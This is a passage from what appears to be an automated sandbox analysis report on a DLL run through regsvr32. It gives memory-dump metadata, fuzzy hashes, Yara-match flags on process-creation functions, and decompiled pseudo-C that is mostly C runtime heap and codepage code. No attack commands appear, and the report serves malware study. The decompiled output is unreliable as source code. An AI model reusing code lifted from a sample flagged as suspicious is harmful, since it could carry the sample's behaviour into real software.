                                                                                0x7ffa5246a7af
                                                                                0x7ffa5246a7b4
                                                                                0x7ffa5246a7c4
                                                                                0x7ffa5246a7ca
                                                                                0x7ffa5246a7d7
                                                                                0x7ffa5246a7dc
                                                                                0x7ffa5246a7f2
                                                                                0x7ffa5246a804
                                                                                0x7ffa5246a81b
                                                                                0x7ffa5246a828
                                                                                0x7ffa5246a84b
                                                                                0x7ffa5246a86d
                                                                                0x7ffa5246a874
                                                                                0x7ffa5246a88a
                                                                                0x7ffa5246a897
                                                                                0x7ffa5246a8ba
                                                                                0x7ffa5246a8dc
                                                                                0x7ffa5246a8e3
                                                                                0x7ffa5246a8f4
                                                                                0x7ffa5246a8fc
                                                                                0x7ffa5246a901
                                                                                0x7ffa5246a906
                                                                                0x7ffa5246a91a
                                                                                0x7ffa5246a91c
                                                                                0x7ffa5246a92e
                                                                                0x7ffa5246a93c
                                                                                0x7ffa5246a946
                                                                                0x7ffa5246a94f
                                                                                0x7ffa5246a953
                                                                                0x7ffa5246a960
                                                                                0x7ffa5246a96a
                                                                                0x7ffa5246a96e
                                                                                0x7ffa5246a976
                                                                                0x7ffa5246a981
                                                                                0x7ffa5246a984
                                                                                0x7ffa5246a98b
                                                                                0x7ffa5246a993
                                                                                0x7ffa5246a99a
                                                                                0x7ffa5246a9a4
                                                                                0x7ffa5246a9ae
                                                                                0x7ffa5246a9b7
                                                                                0x7ffa5246a9bb
                                                                                0x7ffa5246a9c8
                                                                                0x7ffa5246a9d2
                                                                                0x7ffa5246a9d6
                                                                                0x7ffa5246a9de
                                                                                0x7ffa5246a9e9
                                                                                0x7ffa5246a9ec
                                                                                0x7ffa5246a9f3
                                                                                0x7ffa5246a9fb
                                                                                0x7ffa5246aa02
                                                                                0x7ffa5246aa04
                                                                                0x7ffa5246aa0b
                                                                                0x7ffa5246aa13
                                                                                0x7ffa5246aa1b
                                                                                0x7ffa5246aa20
                                                                                0x7ffa5246aa28
                                                                                0x7ffa5246aa37

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $z
                                                                                • API String ID: 1807457897-2251613814
                                                                                • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                • Instruction ID: 7687552d0a23a13589fb65a2f8db9786e1031432dcd143424dda828b354deb30
                                                                                • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                • Instruction Fuzzy Hash: 04B1DB7261CAC0CAD775CB25E8507ABB7E0F789785F145125DACD83B89DB6CE4419F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52469C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                                                • API String ID: 4112623284-4095683531
                                                                                • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                • Instruction ID: ee83308909762c07a79813b80b2aadfe827ba7cd9381565f135c2e5dd02e7377
                                                                                • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                • Instruction Fuzzy Hash: 4F911E36618B8596E7608F15E88036E77F0FB89794F488135EA9D477A8DFBCE541CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246461B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E00007FFA7FFA5246461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
				signed int _t64;
				intOrPtr _t66;
				void* _t73;
				void* _t92;
				long long _t98;
				long long _t113;
				long long _t114;
				long long _t115;
				long long _t130;
				intOrPtr _t132;
				long long _t135;

				if (_a136 == 1) goto 0x52464672;
				_t64 = _a136 & 0x0000ffff;
				if (_t64 == 2) goto 0x52464672;
				if (_a136 == 3) goto 0x52464672;
				_a40 = "Error: memory allocation: bad memory block type.\n";
				_a32 = "%s";
				r9d = 0;
				r8d = 0;
				0x5246ad00();
				if (_t64 != 1) goto 0x52464672;
				asm("int3");
				_t98 = _a128 + 0x34;
				_a96 = _t98;
				0x5246ac90(); // executed
				_a80 = _t98;
				if (_a80 != 0) goto 0x524646b8;
				if (_a160 == 0) goto 0x524646b3;
				 *_a160 = 0xc;
				goto 0x524648b4;
				_t66 =  *0x5248b03c; // 0x38
				 *0x5248b03c = _t66 + 1;
				if (_a64 == 0) goto 0x5246472d;
				 *_a80 = 0;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = 0;
				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = 3;
				 *((intOrPtr*)(_a80 + 0x28)) = 0;
				goto 0x52464844;
				if (0xffffffff -  *0x5248c960 - _a128 <= 0) goto 0x52464763;
				_t130 =  *0x5248c960; // 0x4509
				 *0x5248c960 = _t130 + _a128;
				goto 0x5246476e;
				 *0x5248c960 = 0xffffffff;
				_t132 =  *0x5248c990; // 0xb3d
				 *0x5248c990 = _t132 + _a128;
				_t113 =  *0x5248c978; // 0x3425
				_t92 =  *0x5248c990 - _t113; // 0xb3d
				if (_t92 <= 0) goto 0x524647a8;
				_t114 =  *0x5248c990; // 0xb3d
				 *0x5248c978 = _t114;
				if ( *0x5248c980 == 0) goto 0x524647c4;
				_t115 =  *0x5248c980; // 0x2510b50
				 *((long long*)(_t115 + 8)) = _a80;
				goto 0x524647d0;
				 *0x5248c968 = _a80;
				_t135 =  *0x5248c980; // 0x2510b50
				 *_a80 = _t135;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = _a144;
				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = _a136;
				_t78 = _a88;
				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
				 *0x5248c980 = _a80;
				r8d = 4;
				E00007FFA7FFA524632B0( *0x5248b04c & 0x000000ff, _a88,  *0x5248b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
				_t145 = _a128;
				r8d = 4;
				E00007FFA7FFA524632B0( *0x5248b04c & 0x000000ff, _a88,  *0x5248b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
				_t73 = E00007FFA7FFA524632B0( *0x5248b04f & 0x000000ff, _t78,  *0x5248b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
				_a72 = _a80 + 0x30;
				return E00007FFA7FFA52469360(_t73, 4);
			}














                                                                                0x7ffa52464623
                                                                                0x7ffa5246462c
                                                                                0x7ffa52464634
                                                                                0x7ffa5246463e
                                                                                0x7ffa52464647
                                                                                0x7ffa52464653
                                                                                0x7ffa52464658
                                                                                0x7ffa5246465b
                                                                                0x7ffa52464665
                                                                                0x7ffa5246466d
                                                                                0x7ffa5246466f
                                                                                0x7ffa5246467a
                                                                                0x7ffa5246467e
                                                                                0x7ffa52464688
                                                                                0x7ffa5246468d
                                                                                0x7ffa52464698
                                                                                0x7ffa524646a3
                                                                                0x7ffa524646ad
                                                                                0x7ffa524646b3
                                                                                0x7ffa524646b8
                                                                                0x7ffa524646c0
                                                                                0x7ffa524646cb
                                                                                0x7ffa524646d2
                                                                                0x7ffa524646de
                                                                                0x7ffa524646eb
                                                                                0x7ffa524646f8
                                                                                0x7ffa5246470c
                                                                                0x7ffa52464715
                                                                                0x7ffa52464721
                                                                                0x7ffa52464728
                                                                                0x7ffa52464743
                                                                                0x7ffa5246474d
                                                                                0x7ffa5246475a
                                                                                0x7ffa52464761
                                                                                0x7ffa52464763
                                                                                0x7ffa52464776
                                                                                0x7ffa52464783
                                                                                0x7ffa5246478a
                                                                                0x7ffa52464791
                                                                                0x7ffa52464798
                                                                                0x7ffa5246479a
                                                                                0x7ffa524647a1
                                                                                0x7ffa524647b0
                                                                                0x7ffa524647b2
                                                                                0x7ffa524647be
                                                                                0x7ffa524647c2
                                                                                0x7ffa524647c9
                                                                                0x7ffa524647d5
                                                                                0x7ffa524647dc
                                                                                0x7ffa524647e4
                                                                                0x7ffa524647f9
                                                                                0x7ffa52464809
                                                                                0x7ffa52464819
                                                                                0x7ffa52464829
                                                                                0x7ffa52464831
                                                                                0x7ffa52464835
                                                                                0x7ffa5246483d
                                                                                0x7ffa52464854
                                                                                0x7ffa5246485c
                                                                                0x7ffa5246486d
                                                                                0x7ffa5246487a
                                                                                0x7ffa52464882
                                                                                0x7ffa524648a1
                                                                                0x7ffa524648af
                                                                                0x7ffa524648c7

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: Error: memory allocation: bad memory block type.
                                                                                • API String ID: 2480363372-1537269110
                                                                                • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                • Instruction ID: 0668d104d0b53f96e2a9f97f40a07c2dac6463ed54f7c3ea43b86d9ce6363393
                                                                                • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                • Instruction Fuzzy Hash: 47710036A19B8586DB64CB55F89032AB7F0F78AB54F048575DA9D437A8CFBCD044CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180024EE6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: z
                                                                                • API String ID: 963392458-1375040831
                                                                                • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                                • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0000000180024F28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: z
                                                                                • API String ID: 963392458-1375040831
                                                                                • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                                • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52466FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer_initterm_e
                                                                                • String ID: Y
                                                                                • API String ID: 1618838664-1754117475
                                                                                • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                • Instruction ID: 714057d16cc1c7af4527cd2a5c9e9bd6aadedecc2b5737a765fec0c4cca89430
                                                                                • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                • Instruction Fuzzy Hash: 79E0C921A2C482A7E620EB20EC441BA33F0FF92348F488131E24E464ADDFACF945CB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246A000 Relevance: 3.3, APIs: 2, Instructions: 256COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E00007FFA7FFA5246A000(signed short __ecx, void* __rcx, long long __rdx, signed int _a8, void* _a16) {
				signed int _v24;
				signed char* _v32;
				char _v50;
				char _v56;
				signed int _v72;
				signed char* _v80;
				signed int _v84;
				signed int _v88;
				signed long long _t204;
				signed long long _t205;
				signed long long _t206;
				signed char* _t215;
				signed long long _t218;
				signed long long _t233;
				signed long long _t234;

				_a16 = __rdx;
				_a8 = __ecx;
				_t204 =  *0x5248b018; // 0x6ebca90f5d98
				_t205 = _t204 ^ _t234;
				_v24 = _t205;
				_a8 = E00007FFA7FFA52469F20(_a8, _t205);
				if (_a8 != 0) goto 0x5246a04d;
				E00007FFA7FFA5246A4E0(_a16);
				goto 0x5246a463;
				_v84 = 0;
				_v84 = _v84 + 1;
				if (_t205 - 5 >= 0) goto 0x5246a239;
				_t206 = _t205 * 0x30;
				if ( *((intOrPtr*)(0x5248bb70 + _t206)) != _a8) goto 0x5246a234;
				_v72 = 0;
				goto 0x5246a0a2;
				_v72 = _v72 + 1;
				if (_v72 - 0x101 >= 0) goto 0x5246a0bf;
				 *((char*)(_a16 + _t206 + 0x1c)) = 0;
				goto 0x5246a098;
				_v88 = 0;
				goto 0x5246a0d3;
				_v88 = _v88 + 1;
				if (_v88 - 4 >= 0) goto 0x5246a197;
				_v80 = 0x47fcce48e9700;
				goto 0x5246a111;
				_v80 =  &(_v80[2]);
				if (( *_v80 & 0x000000ff) == 0) goto 0x5246a192;
				if ((_v80[1] & 0x000000ff) == 0) goto 0x5246a192;
				_v72 =  *_v80 & 0x000000ff;
				goto 0x5246a142;
				_v72 = _v72 + 1;
				_t215 = _v80;
				if (_v72 - ( *(_t215 + 1) & 0x000000ff) > 0) goto 0x5246a18d;
				_t233 = _a16;
				 *((char*)(_t233 + 0x5248bb70 + _t206 * 0x30 + 0x1c)) =  *(_a16 + _t215 + 0x1c) & 0x000000ff |  *0xFFF4A49176D8;
				goto 0x5246a138;
				goto 0x5246a103;
				goto 0x5246a0c9;
				 *(_a16 + 4) = _a8;
				 *((intOrPtr*)(_a16 + 8)) = 1;
				_t218 = _a16;
				 *(_a16 + 0xc) = E00007FFA7FFA5246A480( *((intOrPtr*)(_t218 + 4)));
				_v88 = 0;
				goto 0x5246a1e7;
				_v88 = _v88 + 1;
				if (_v88 - 6 >= 0) goto 0x5246a220;
				_t205 = 0x5248bb70;
				 *((short*)(_a16 + 0x10 + _t233 * 2)) =  *(0x5248bb70 + 4 + (0x5248bb70 + _t218 * 0x30) * 2) & 0x0000ffff;
				goto 0x5246a1dd;
				E00007FFA7FFA5246A5E0(_a16);
				goto 0x5246a463;
				goto L1;
				if (_a8 == 0) goto 0x5246a271;
				if (_a8 == 0xfde8) goto 0x5246a271;
				if (_a8 == 0xfde9) goto 0x5246a271;
				__eax = _a8 & 0x0000ffff;
				__ecx = _a8 & 0x0000ffff;
				if (IsValidCodePage(??) != 0) goto 0x5246a27b;
				__eax = 0xffffffff;
				goto 0x5246a463;
				__rdx =  &_v56;
				__ecx = _a8;
				if (GetCPInfo(??, ??) == 0) goto 0x5246a444;
				_v72 = 0;
				goto 0x5246a2a9;
				_v72 = _v72 + 1;
				_v72 = _v72 + 1;
				if (_v72 - 0x101 >= 0) goto 0x5246a2c6;
				__eax = _v72;
				__rcx = _a16;
				 *((char*)(_a16 + __rax + 0x1c)) = 0;
				goto 0x5246a29f;
				__rax = _a16;
				__ecx = _a8;
				 *(_a16 + 4) = _a8;
				__rax = _a16;
				 *(_a16 + 0xc) = 0;
				if (_v56 - 1 <= 0) goto 0x5246a3f4;
				__rax =  &_v50;
				_v32 =  &_v50;
				goto 0x5246a30c;
				_v32 =  &(_v32[2]);
				_v32 =  &(_v32[2]);
				__rax = _v32;
				__eax =  *_v32 & 0x000000ff;
				if (( *_v32 & 0x000000ff) == 0) goto 0x5246a37c;
				__rax = _v32;
				__eax =  *(__rax + 1) & 0x000000ff;
				if (( *(__rax + 1) & 0x000000ff) == 0) goto 0x5246a37c;
				__rax = _v32;
				__eax =  *_v32 & 0x000000ff;
				_v72 =  *_v32 & 0x000000ff;
				goto 0x5246a33d;
				_v72 = _v72 + 1;
				_v72 = _v72 + 1;
				__rax = _v32;
				__eax =  *(__rax + 1) & 0x000000ff;
				if (_v72 - ( *(__rax + 1) & 0x000000ff) > 0) goto 0x5246a37a;
				_v72 = _v72 + 1;
				__rcx = _a16;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000004;
				_v72 = _v72 + 1;
				__rdx = _a16;
				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
				goto 0x5246a333;
				goto 0x5246a2fe;
				_v72 = 1;
				goto 0x5246a390;
				_v72 = _v72 + 1;
				_v72 = _v72 + 1;
				if (_v72 - 0xff >= 0) goto 0x5246a3c8;
				_v72 = _v72 + 1;
				__rcx = _a16;
				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000008;
				_v72 = _v72 + 1;
				__rdx = _a16;
				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
				goto 0x5246a386;
				__rax = _a16;
				__ecx =  *(_a16 + 4);
				__eax = E00007FFA7FFA5246A480( *(_a16 + 4));
				__rcx = _a16;
				 *(_a16 + 0xc) = __eax;
				__rax = _a16;
				 *((intOrPtr*)(_a16 + 8)) = 1;
				goto 0x5246a403;
				__rax = _a16;
				 *(__rax + 8) = 0;
				_v88 = 0;
				goto 0x5246a417;
				_v88 = _v88 + 1;
				_v88 = _v88 + 1;
				if (_v88 - 6 >= 0) goto 0x5246a433;
				__eax = _v88;
				__ecx = 0;
				__rdx = _a16;
				 *((short*)(_a16 + 0x10 + __rax * 2)) = __cx;
				goto 0x5246a40d;
				__rcx = _a16;
				__eax = E00007FFA7FFA5246A5E0(_a16); // executed
				__eax = 0;
				goto 0x5246a463;
				if ( *0x5248cd68 == 0) goto 0x5246a45e;
				__rcx = _a16;
				E00007FFA7FFA5246A4E0(_a16) = 0;
				goto 0x5246a463;
				__eax = 0xffffffff;
				__rcx = _v24;
				__rcx = _v24 ^ __rsp;
				return E00007FFA7FFA52463280(0xffffffff, __ecx, __edx, _v24 ^ __rsp, __rdx, __r8);
			}


















                                                                                0x7ffa5246a000
                                                                                0x7ffa5246a005
                                                                                0x7ffa5246a00d
                                                                                0x7ffa5246a014
                                                                                0x7ffa5246a017
                                                                                0x7ffa5246a028
                                                                                0x7ffa5246a037
                                                                                0x7ffa5246a041
                                                                                0x7ffa5246a048
                                                                                0x7ffa5246a04d
                                                                                0x7ffa5246a05d
                                                                                0x7ffa5246a069
                                                                                0x7ffa5246a073
                                                                                0x7ffa5246a088
                                                                                0x7ffa5246a08e
                                                                                0x7ffa5246a096
                                                                                0x7ffa5246a09e
                                                                                0x7ffa5246a0aa
                                                                                0x7ffa5246a0b8
                                                                                0x7ffa5246a0bd
                                                                                0x7ffa5246a0bf
                                                                                0x7ffa5246a0c7
                                                                                0x7ffa5246a0cf
                                                                                0x7ffa5246a0d8
                                                                                0x7ffa5246a0fc
                                                                                0x7ffa5246a101
                                                                                0x7ffa5246a10c
                                                                                0x7ffa5246a11b
                                                                                0x7ffa5246a128
                                                                                0x7ffa5246a132
                                                                                0x7ffa5246a136
                                                                                0x7ffa5246a13e
                                                                                0x7ffa5246a142
                                                                                0x7ffa5246a14f
                                                                                0x7ffa5246a17f
                                                                                0x7ffa5246a187
                                                                                0x7ffa5246a18b
                                                                                0x7ffa5246a18d
                                                                                0x7ffa5246a192
                                                                                0x7ffa5246a1a6
                                                                                0x7ffa5246a1b1
                                                                                0x7ffa5246a1b8
                                                                                0x7ffa5246a1d0
                                                                                0x7ffa5246a1d3
                                                                                0x7ffa5246a1db
                                                                                0x7ffa5246a1e3
                                                                                0x7ffa5246a1ec
                                                                                0x7ffa5246a200
                                                                                0x7ffa5246a218
                                                                                0x7ffa5246a21e
                                                                                0x7ffa5246a228
                                                                                0x7ffa5246a22f
                                                                                0x7ffa5246a234
                                                                                0x7ffa5246a241
                                                                                0x7ffa5246a24e
                                                                                0x7ffa5246a25b
                                                                                0x7ffa5246a25d
                                                                                0x7ffa5246a265
                                                                                0x7ffa5246a26f
                                                                                0x7ffa5246a271
                                                                                0x7ffa5246a276
                                                                                0x7ffa5246a27b
                                                                                0x7ffa5246a280
                                                                                0x7ffa5246a28f
                                                                                0x7ffa5246a295
                                                                                0x7ffa5246a29d
                                                                                0x7ffa5246a2a3
                                                                                0x7ffa5246a2a5
                                                                                0x7ffa5246a2b1
                                                                                0x7ffa5246a2b3
                                                                                0x7ffa5246a2b7
                                                                                0x7ffa5246a2bf
                                                                                0x7ffa5246a2c4
                                                                                0x7ffa5246a2c6
                                                                                0x7ffa5246a2ce
                                                                                0x7ffa5246a2d5
                                                                                0x7ffa5246a2d8
                                                                                0x7ffa5246a2e0
                                                                                0x7ffa5246a2ec
                                                                                0x7ffa5246a2f2
                                                                                0x7ffa5246a2f7
                                                                                0x7ffa5246a2fc
                                                                                0x7ffa5246a303
                                                                                0x7ffa5246a307
                                                                                0x7ffa5246a30c
                                                                                0x7ffa5246a311
                                                                                0x7ffa5246a316
                                                                                0x7ffa5246a318
                                                                                0x7ffa5246a31d
                                                                                0x7ffa5246a323
                                                                                0x7ffa5246a325
                                                                                0x7ffa5246a32a
                                                                                0x7ffa5246a32d
                                                                                0x7ffa5246a331
                                                                                0x7ffa5246a337
                                                                                0x7ffa5246a339
                                                                                0x7ffa5246a33d
                                                                                0x7ffa5246a342
                                                                                0x7ffa5246a34a
                                                                                0x7ffa5246a350
                                                                                0x7ffa5246a354
                                                                                0x7ffa5246a361
                                                                                0x7ffa5246a368
                                                                                0x7ffa5246a36c
                                                                                0x7ffa5246a374
                                                                                0x7ffa5246a378
                                                                                0x7ffa5246a37a
                                                                                0x7ffa5246a37c
                                                                                0x7ffa5246a384
                                                                                0x7ffa5246a38a
                                                                                0x7ffa5246a38c
                                                                                0x7ffa5246a398
                                                                                0x7ffa5246a39e
                                                                                0x7ffa5246a3a2
                                                                                0x7ffa5246a3af
                                                                                0x7ffa5246a3b6
                                                                                0x7ffa5246a3ba
                                                                                0x7ffa5246a3c2
                                                                                0x7ffa5246a3c6
                                                                                0x7ffa5246a3c8
                                                                                0x7ffa5246a3d0
                                                                                0x7ffa5246a3d3
                                                                                0x7ffa5246a3d8
                                                                                0x7ffa5246a3e0
                                                                                0x7ffa5246a3e3
                                                                                0x7ffa5246a3eb
                                                                                0x7ffa5246a3f2
                                                                                0x7ffa5246a3f4
                                                                                0x7ffa5246a3fc
                                                                                0x7ffa5246a403
                                                                                0x7ffa5246a40b
                                                                                0x7ffa5246a411
                                                                                0x7ffa5246a413
                                                                                0x7ffa5246a41c
                                                                                0x7ffa5246a41e
                                                                                0x7ffa5246a422
                                                                                0x7ffa5246a424
                                                                                0x7ffa5246a42c
                                                                                0x7ffa5246a431
                                                                                0x7ffa5246a433
                                                                                0x7ffa5246a43b
                                                                                0x7ffa5246a440
                                                                                0x7ffa5246a442
                                                                                0x7ffa5246a44b
                                                                                0x7ffa5246a44d
                                                                                0x7ffa5246a45a
                                                                                0x7ffa5246a45c
                                                                                0x7ffa5246a45e
                                                                                0x7ffa5246a463
                                                                                0x7ffa5246a468
                                                                                0x7ffa5246a474

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID:
                                                                                • API String ID: 1901436342-0
                                                                                • Opcode ID: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                • Instruction ID: e663cfca82f58cefa88257072fbb953d0bdc0f3644d3996fa13f2cc0e14c2a4f
                                                                                • Opcode Fuzzy Hash: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                • Instruction Fuzzy Hash: 62D11E3261CA918AD7A4CB15E88476AB7F0F789744F188135EACE87B98DF7CE4458F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E00007FFA7FFA52467540(long long __rax) {
				long long _v24;
				void* _t8;
				void* _t9;

				_t16 = __rax;
				_t9 = E00007FFA7FFA52463D00(_t8); // executed
				_v24 = __rax;
				return E00007FFA7FFA5246CF20(E00007FFA7FFA5246CFB0(E00007FFA7FFA5246D450(E00007FFA7FFA5246D470(E00007FFA7FFA5246BD50(E00007FFA7FFA5246AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
			}






                                                                                0x7ffa52467540
                                                                                0x7ffa52467544
                                                                                0x7ffa52467549
                                                                                0x7ffa5246758e

                                                                                APIs
